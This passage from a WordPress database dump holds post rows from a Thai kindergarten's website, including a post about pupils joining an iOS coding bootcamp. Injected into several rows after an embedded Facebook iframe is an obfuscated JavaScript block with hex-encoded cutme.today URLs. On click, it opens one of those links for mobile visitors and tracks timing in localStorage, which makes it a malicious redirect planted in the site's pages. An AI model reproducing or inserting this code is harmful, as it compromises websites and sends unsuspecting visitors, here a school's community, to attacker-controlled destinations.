_0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-07-29 18:33:23','2024-07-29 11:33:23','',19,'http://watprato.ssk.in.th/?p=95',0,'revision','',0),
(96,1,'2024-07-29 18:35:19','2024-07-29 11:35:19','<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3Dpfbid023eBb281c8Fow3R13F6zCc7EMU2mWEEyzr9TXHucesMAJ2pTr3wLbGM3xitBxsmcil%26id%3D61556083436494&show_text=true&width=500\" width=\"500\" height=\"786\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','โรงเรียนอนุบาลวัดพระโต นำนักเรียนเข้าร่วมกิจกรรม Si Sa Ket Bootcamp ซึ่งจัดโดย Swift Coding Club TH ร่วมกับสมาคมกีฬาแห่งจังหวัดศรีสะเกษ และ หอการค้าจังหวัดศรีสะเกษ เพื่อให้เด็ก ๆ ได้สัมผัสประสบการณ์จริงในการสร้าง iOS app บน iPad','','publish','open','open','','%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%ad%e0%b8%99%e0%b8%b8%e0%b8%9a%e0%b8%b2%e0%b8%a5%e0%b8%a7%e0%b8%b1%e0%b8%94%e0%b8%9e%e0%b8%a3%e0%b8%b0%e0%b9%82%e0%b8%95','','','2024-07-29 18:36:01','2024-07-29 11:36:01','',0,'http://watprato.ssk.in.th/?p=96',0,'post','',0),
(97,1,'2024-07-29 18:35:03','2024-07-29 11:35:03','','452968986_122165652428202781_733399249219556966_n','','inherit','open','closed','','452968986_122165652428202781_733399249219556966_n','','','2024-07-29 18:35:03','2024-07-29 11:35:03','',96,'http://watprato.ssk.in.th/wp-content/uploads/2024/07/452968986_122165652428202781_733399249219556966_n.jpg',0,'attachment','image/jpeg',0),
(98,1,'2024-07-29 18:35:19','2024-07-29 11:35:19','<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3Dpfbid023eBb281c8Fow3R13F6zCc7EMU2mWEEyzr9TXHucesMAJ2pTr3wLbGM3xitBxsmcil%26id%3D61556083436494&show_text=true&width=500\" width=\"500\" height=\"786\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','โรงเรียนอนุบาลวัดพระโต โดยคุณครูอุเทน สมาคมนำนักเรียนเข้าร่วมกิจกรรม Si Sa Ket Bootcamp ซึ่งจัดโดย Swift Coding Club TH ร่วมกับสมาคมกีฬาแห่งจังหวัดศรีสะเกษ และ หอการค้าจังหวัดศรีสะเกษ เพื่อให้เด็ก ๆ ได้สัมผัสประสบการณ์จริงในการสร้าง iOS app บน iPad','','inherit','closed','closed','','96-revision-v1','','','2024-07-29 18:35:19','2024-07-29 11:35:19','',96,'http://watprato.ssk.in.th/?p=98',0,'revision','',0),
